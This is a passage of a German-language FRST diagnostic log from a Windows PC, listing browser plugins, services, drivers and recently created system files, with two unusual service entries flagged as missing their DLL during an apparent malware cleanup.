FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~3\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-11-10] (Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [2016-02-09] (NVIDIA Corporation)
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [2016-02-09] (NVIDIA Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [Keine Datei]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-04-05] (Adobe Systems Inc.)
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome: 
=======
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - Chrome.exe

==================== Dienste (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

S2  MicrosoftCRLSrv; C:\Windows\System32\svchost.exe [27648 2012-01-06] (Microsoft Corporation) <==== ACHTUNG (ServiceDLL nicht gefunden)
S2  MicrosoftCRLSrv; C:\Windows\SysWOW64\svchost.exe [21504 2012-01-06] (Microsoft Corporation) <==== ACHTUNG (ServiceDLL nicht gefunden)
R2 AAV UpdateService; C:\Program Files (x86)\Lexware\AAVUpdateManager\aavus.exe [128296 2008-10-24] ()
R2 Avira Secure Backup Crawler; C:\Program Files\Avira Secure Backup\Avira Secure BackupCrawler.exe [2258000 2013-11-06] () [Datei ist nicht signiert]
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [225280 2011-08-05] (DTS, Inc)
R2 FUJ02E3Service; C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe [76104 2011-11-24] (FUJITSU LIMITED)
R2 GfExperienceService; C:\Program Files\NVIDIA Corporation\GeForce Experience Service\GfExperienceService.exe [1163200 2016-01-12] (NVIDIA Corporation)
R2 HP DS Service; C:\Program Files (x86)\HP\HPBDSService\HPBDSService.exe [13824 2011-10-17] (Hewlett-Packard Company) [Datei ist nicht signiert]
R2 HP LaserJet Service; C:\Program Files (x86)\HP\HPLaserJetService\HPLaserJetService.exe [164864 2012-05-02] (HP) [Datei ist nicht signiert]
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [161560 2011-12-16] (Intel Corporation)
R2 MBAMService; C:\Program Files\Malwarebytes\mbamservice.exe [4470736 2017-05-09] (Malwarebytes)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273168 2011-12-08] ()
R2 Net Driver HPZ12; C:\Windows\system32\HPZinw12.dll [50688 2011-04-13] (Hewlett-Packard) [Datei ist nicht signiert]
R2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1879488 2016-01-12] (NVIDIA Corporation)
R3 NvStreamNetworkSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamNetworkService.exe [6308288 2016-01-12] (NVIDIA Corporation)
R2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamService.exe [4812736 2016-01-12] (NVIDIA Corporation)
R2 PDF Architect Helper Service; C:\Program Files (x86)\PDF Architect\HelperService.exe [1320496 2013-04-08] (pdfforge GmbH)
R2 PDF Architect Service; C:\Program Files (x86)\PDF Architect\ConversionService.exe [799280 2013-04-08] (pdfforge GmbH)
R2 PFNService; C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe [2213376 2011-12-22] (FUJITSU LIMITED) [Datei ist nicht signiert]
R2 Pml Driver HPZ12; C:\Windows\system32\HPZipm12.dll [66048 2011-04-13] (Hewlett-Packard) [Datei ist nicht signiert]
R2 PowerSavingUtilityService; C:\Program Files\Fujitsu\PSUtility\PSUService.exe [63856 2011-10-03] (FUJITSU LIMITED)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [594704 2011-12-08] (Intel® Corporation)
S2 gupdate; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /svc [X]
S3 gupdatem; "C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /medsvc [X]

===================== Treiber (Nicht auf der Ausnahmeliste) ======================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [134696 2011-11-23] (Broadcom Corporation.)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [77440 2017-05-09] ()
R0 FBIOSDRV; C:\Windows\System32\Drivers\FBIOSDRV.sys [21104 2009-06-24] (FUJITSU LIMITED)
R3 FUJ02B1; C:\Windows\System32\DRIVERS\FUJ02B1.sys [59152 2016-05-11] (FUJITSU LIMITED)
R3 FUJ02E3; C:\Windows\system32\drivers\FUJ02E3.sys [7296 2006-11-01] (FUJITSU LIMITED)
S3 HTCAND64; C:\Windows\System32\Drivers\ANDROIDUSB.sys [33736 2009-11-02] (HTC, Corporation) [Datei ist nicht signiert]
R2 MBAMChameleon; C:\Windows\system32\drivers\MBAMChameleon.sys [187320 2017-05-22] (Malwarebytes)
R3 MBAMFarflt; C:\Windows\system32\drivers\farflt.sys [113592 2017-05-22] (Malwarebytes)
R3 MBAMProtection; C:\Windows\system32\drivers\mbam.sys [43968 2017-05-22] (Malwarebytes)
R0 MBAMSwissArmy; C:\Windows\System32\drivers\MBAMSwissArmy.sys [251832 2017-05-22] (Malwarebytes)
R3 MBAMWebProtection; C:\Windows\system32\drivers\mwac.sys [84256 2017-05-22] (Malwarebytes)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [26560 2016-01-12] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [47760 2015-12-18] (NVIDIA Corporation)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-28] ()
S3 clwvd; system32\DRIVERS\clwvd.sys [X]

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Drei Monate: Erstellte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2017-05-22 17:34 - 2017-05-22 20:54 - 00113592 _____ (Malwarebytes) C:\Windows\system32\Drivers\farflt.sys
2017-05-22 17:34 - 2017-05-22 20:54 - 00084256 _____ (Malwarebytes) C:\Windows\system32\Drivers\mwac.sys
2017-05-22 17:34 - 2017-05-22 20:54 - 00043968 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2017-05-22 17:34 - 2017-05-22 17:34 - 00001688 _____ C:\Users\Public\Desktop\Malwarebytes.lnk
2017-05-22 17:34 - 2017-05-22 17:34 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes
2017-05-22 17:34 - 2017-05-22 17:34 - 00000000 ____D C:\Program Files\Malwarebytes
2017-05-22 17:34 - 2017-05-09 16:37 - 00077440 _____ C:\Windows\system32\Drivers\mbae64.sys
2017-05-21 19:34 - 2017-05-21 19:45 - 00000000 ____D C:\AdwCleaner
2017-05-21 19:30 - 2017-05-21 19:30 - 04102600 _____ C:\Users\Markus\Desktop\AdwCleaner_6.046.exe
2017-05-21 08:41 - 2017-05-22 20:54 - 00251832 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2017-05-21 08:41 - 2017-05-22 17:34 - 00000000 ____D C:\ProgramData\Malwarebytes
2017-05-21 08:41 - 2017-05-21 12:48 - 00000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-05-21 08:40 - 2017-05-22 17:34 - 00187320 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2017-05-21 08:39 - 2017-05-22 17:31 - 00000000 ____D C:\Anti Malware
2017-05-20 17:24 - 2017-05-20 17:24 - 00000085 _____ C:\Windows\wininit.ini
2017-05-18 17:24 - 2017-05-22 20:57 - 00000000 ____D C:\FRST
2017-05-18 17:24 - 2017-05-18 17:24 - 02429952 _____ (Farbar) C:\Users\Markus\Downloads\FRST64.exe
2017-05-17 14:15 - 2017-05-17 14:15 - 00000000 _____ C:\Windows\SysWOW64\1111
2017-05-13 20:30 - 2017-05-13 20:30 - 00000000 ____D C:\Users\Markus\AppData\Local\{991DAACD-0AC8-4F88-9A36-26B7D28A3D35}
2017-05-13 19:31 - 2017-05-13 19:31 - 05821944 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2017-05-10 15:56 - 2017-04-28 03:14 - 05547240 _____ (Microsoft Corporation) C:\Windows\system32\ntoskrnl.exe
2017-05-10 15:56 - 2017-04-28 03:14 - 00706792 _____ (Microsoft Corporation) C:\Windows\system32\winload.efi
2017-05-10 15:56 - 2017-04-28 03:14 - 00631176 _____ (Microsoft Corporation) C:\Windows\system32\winresume.efi
2017-05-10 15:56 - 2017-04-28 03:14 - 00154856 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecpkg.sys
2017-05-10 15:56 - 2017-04-28 03:14 - 00095464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\ksecdd.sys
2017-05-10 15:56 - 2017-04-28 03:11 - 01732864 _____ (Microsoft Corporation) C:\Windows\system32\ntdll.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 01460736 _____ (Microsoft Corporation) C:\Windows\system32\lsasrv.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 01212928 _____ (Microsoft Corporation) C:\Windows\system32\rpcrt4.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 01163264 _____ (Microsoft Corporation) C:\Windows\system32\kernel32.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00730624 _____ (Microsoft Corporation) C:\Windows\system32\kerberos.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00503808 _____ (Microsoft Corporation) C:\Windows\system32\srcore.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00419840 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00362496 _____ (Microsoft Corporation) C:\Windows\system32\wow64win.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00345600 _____ (Microsoft Corporation) C:\Windows\system32\schannel.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00316928 _____ (Microsoft Corporation) C:\Windows\system32\msv1_0.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00312320 _____ (Microsoft Corporation) C:\Windows\system32\ncrypt.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\wow64.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00215552 _____ (Microsoft Corporation) C:\Windows\system32\winsrv.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00210432 _____ (Microsoft Corporation) C:\Windows\system32\wdigest.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00190464 _____ (Microsoft Corporation) C:\Windows\system32\rpchttp.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\msaudite.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00135680 _____ (Microsoft Corporation) C:\Windows\system32\sspicli.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00086528 _____ (Microsoft Corporation) C:\Windows\system32\TSpkg.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00063488 _____ (Microsoft Corporation) C:\Windows\system32\setbcdlocale.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\msobjs.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00050176 _____ (Microsoft Corporation) C:\Windows\system32\srclient.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00028672 _____ (Microsoft Corporation) C:\Windows\system32\sspisrv.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00028160 _____ (Microsoft Corporation) C:\Windows\system32\secur32.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00016384 _____ (Microsoft Corporation) C:\Windows\system32\ntvdm64.dll
2017-05-10 15:56 - 2017-04-28 03:10 - 00013312 _____ (Microsoft Corporation) C:\Windows\system32\wow64cpu.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00880640 _____ (Microsoft Corporation) C:\Windows\system32\advapi32.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00690688 _____ (Microsoft Corporation) C:\Windows\system32\adtschema.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00463872 _____ (Microsoft Corporation) C:\Windows\system32\certcli.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00123904 _____ (Microsoft Corporation) C:\Windows\system32\bcrypt.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00059904 _____ (Microsoft Corporation) C:\Windows\system32\appidapi.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00044032 _____ (Microsoft Corporation) C:\Windows\system32\csrsrv.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00043520 _____ (Microsoft Corporation) C:\Windows\system32\cryptbase.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00034816 _____ (Microsoft Corporation) C:\Windows\system32\appidsvc.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00022016 _____ (Microsoft Corporation) C:\Windows\system32\credssp.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\apisetschema.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00006144 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-security-base-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00005120 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-file-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-threadpool-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004608 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processthreads-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-sysinfo-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-synch-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localregistry-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00004096 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-localization-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-processenvironment-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-namedpipe-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-misc-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-memory-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-libraryloader-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003584 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-heap-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-xstate-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-util-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-string-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-profile-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-io-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-interlocked-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-handle-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-fibers-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-errorhandling-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-delayload-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-debug-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-datetime-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 03:09 - 00003072 ____H (Microsoft Corporation) C:\Windows\system32\api-ms-win-core-console-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:36 - 04000488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntkrnlpa.exe
2017-05-10 15:56 - 2017-04-28 02:36 - 03945192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntoskrnl.exe
2017-05-10 15:56 - 2017-04-28 02:34 - 01314112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntdll.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 01114112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kernel32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00690688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\adtschema.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00666112 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpcrt4.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00644096 _____ (Microsoft Corporation) C:\Windows\SysWOW64\advapi32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00553472 _____ (Microsoft Corporation) C:\Windows\SysWOW64\kerberos.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\certcli.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00275456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00261120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msv1_0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00254464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\schannel.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00223232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ncrypt.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00172032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wdigest.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00146432 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msaudite.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00141312 _____ (Microsoft Corporation) C:\Windows\SysWOW64\rpchttp.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00096768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sspicli.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00082944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\bcrypt.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00065536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TSpkg.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msobjs.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00050688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\appidapi.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\srclient.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00022016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\secur32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00017408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credssp.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\apisetschema.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00005120 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-file-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00005120 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wow32.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processthreads-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-sysinfo-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-synch-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-misc-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localregistry-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00004096 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-localization-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-processenvironment-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-namedpipe-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-memory-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-libraryloader-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-interlocked-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-heap-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-string-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-rtlsupport-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-profile-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-io-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-handle-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-fibers-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-errorhandling-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-delayload-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-debug-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-datetime-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:32 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-console-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:19 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\appidpolicyconverter.exe
2017-05-10 15:56 - 2017-04-28 02:19 - 00062464 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\appid.sys
2017-05-10 15:56 - 2017-04-28 02:19 - 00017920 _____ (Microsoft Corporation) C:\Windows\system32\appidcertstorecheck.exe
2017-05-10 15:56 - 2017-04-28 02:18 - 00064000 _____ (Microsoft Corporation) C:\Windows\system32\auditpol.exe
2017-05-10 15:56 - 2017-04-28 02:15 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\conhost.exe
2017-05-10 15:56 - 2017-04-28 02:14 - 00296960 _____ (Microsoft Corporation) C:\Windows\system32\rstrui.exe
2017-05-10 15:56 - 2017-04-28 02:12 - 00159744 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb.sys
2017-05-10 15:56 - 2017-04-28 02:11 - 00291328 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb10.sys
2017-05-10 15:56 - 2017-04-28 02:11 - 00129536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\mrxsmb20.sys
2017-05-10 15:56 - 2017-04-28 02:11 - 00050176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\auditpol.exe
2017-05-10 15:56 - 2017-04-28 02:10 - 00112640 _____ (Microsoft Corporation) C:\Windows\system32\smss.exe
2017-05-10 15:56 - 2017-04-28 02:10 - 00030720 _____ (Microsoft Corporation) C:\Windows\system32\lsass.exe
2017-05-10 15:56 - 2017-04-28 02:08 - 00025600 _____ (Microsoft Corporation) C:\Windows\SysWOW64\setup16.exe
2017-05-10 15:56 - 2017-04-28 02:08 - 00014336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ntvdm64.dll
2017-05-10 15:56 - 2017-04-28 02:08 - 00007680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\instnm.exe
2017-05-10 15:56 - 2017-04-28 02:08 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user.exe
2017-05-10 15:56 - 2017-04-28 02:07 - 00036352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cryptbase.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00006144 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-security-base-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00004608 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-threadpool-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00003584 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-xstate-l1-1-0.dll
2017-05-10 15:56 - 2017-04-28 02:07 - 00003072 ____H (Microsoft Corporation) C:\Windows\SysWOW64\api-ms-win-core-util-l1-1-0.dll
2017-05-10 15:56 - 2017-04-26 16:59 - 03220992 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2017-05-10 15:56 - 2017-04-21 17:34 - 01133568 _____ (Microsoft Corporation) C:\Windows\system32\cdosys.dll
2017-05-10 15:56 - 2017-04-21 17:15 - 00805376 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cdosys.dll
2017-05-10 15:56 - 2017-04-20 02:00 - 00394448 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
